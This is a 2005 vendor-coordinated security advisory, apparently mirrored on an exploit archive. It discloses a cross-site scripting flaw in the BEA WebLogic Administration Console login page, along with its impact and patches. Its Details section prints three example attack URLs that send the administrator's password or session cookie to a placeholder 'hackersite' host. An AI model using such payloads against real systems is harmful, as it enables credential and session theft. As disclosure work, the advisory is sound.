exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BEA05-V0101.txt

BEA05-V0101.txt
Posted Aug 14, 2005
Site appsecinc.com

BEA WebLogic Server versions 7.0 and 8.1 suffer from a cross site scripting vulnerability in their login page.

tags | exploit, xss
SHA-256 | 2a58e30cd9efeff84e3f7bf89e1182fa641264f9c16bf6b78f4f68588b00649d

BEA05-V0101.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

BEA WebLogic Administration Console login page cross-site scripting
vulnerability

AppSecInc Team SHATTER Security Advisory BEA05-V0101
https://www.appsecinc.com/resources/alerts/general/BEA-002.html
May 27, 2005

Affected versions: BEA WebLogic Server 7.0 and 8.1

Risk level: High

Credits: This vulnerability was discovered and researched by Agustín
Martínez Fayó of Argeniss for Application Security Inc.

Background:
The Administration Console is a web browser-based, graphical user
interface used to manage a WebLogic Server domain. The Administration
Console supports a full range of product administrative tasks. A
cross-site scripting vulnerability exists in the login page of the
Console.

Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a
legitimate web application into sending malicious code, generally in
the form of a script, to an unsuspecting end user. The attack usually
involves crafting a hyperlink with malicious script code embedded
within it. A valid user is likely to click this link since it points
to a resource on a trusted domain. The link can be posted on a web
page, or sent in an instant message, or email. Clicking on the link
executes the attacker-injected code in the context of the trusted web
application. Typically, the code steals session cookies, which can
then be used to impersonate a valid user.

The "j_username" and "j_password" parameters in the login page of the
Administration Console are vulnerable to cross-site scripting attacks.
User supplied input to these parameters is returned without proper
sanitization, allowing a malicious attacker to inject arbitrary
scripting code.

Below are some examples of the hyperlinks an attacker could use.

Steal administrator's password:
https://vulnerablesite:7001/console/login/LoginForm.jsp?j_password=""onBlur="window.open('https://hackersite/'%2Bdocument.all.j_password.value)"
Get the session cookie :
https://vulnerablesite:7001/console/login/LoginForm.jsp?j_username=""onBlur="window.open('https://hackersite/'%2Bdocument.cookie)"
or
https://vulnerablesite:7001/console/login/LoginForm.jsp?j_password=""onBlur="window.open('https://hackersite/'%2Bdocument.cookie)"

Impact:
Attackers can steal administrator's session cookies and password,
thereby allowing the attacker to impersonate the valid user.


Workaround:
There is no workaround for this issue.

Vendor Status:
Vendor was contacted and a patch was released.

Fix:
For BEA WebLogic Server and WebLogic Express 8.1 upgrade to Service
Pack 4. Apply the patch on top of it located at
ftp://ftpna.bea.com/pub/releases/security/CR202495_810sp4.jar on top
of the service packs.
For BEA WebLogic Server and WebLogic Express 7.0 upgrade to Service
Pack 6. Apply the patch located at
ftp://ftpna.bea.com/pub/releases/security/CR214457_700sp6.jar on top
of the service packs.

Links:
Application Security, Inc advisory:
https://www.appsecinc.com/resources/alerts/general/BEA-002.html
BEA Advisory: https://dev2dev.bea.com/pub/advisory/130

- --
_____________________________________________
Application Security, Inc.
www.appsecinc.com
AppSecInc is the leading provider of database security solutions for
the enterprise. AppSecInc products proactively secure enterprise
applications at more than 300 organizations around the world by
discovering, assessing, and protecting the database against rapidly
changing security threats. By securing data at its source, we enable
organizations to more confidently extend their business with
customers, partners and suppliers. Our security experts, combined with
our strong support team, deliver up-to-date application safeguards
that minimize risk and eliminate its impact on business.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (MingW32)

iD8DBQFCl2Y6/0w1dSVRt4URAhQwAKC+9c6nxvg2cpofISbUXrVhxe8OoACfRrUG
aicgogs0F29Arn6TJLA5gyg=
=KXCI
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close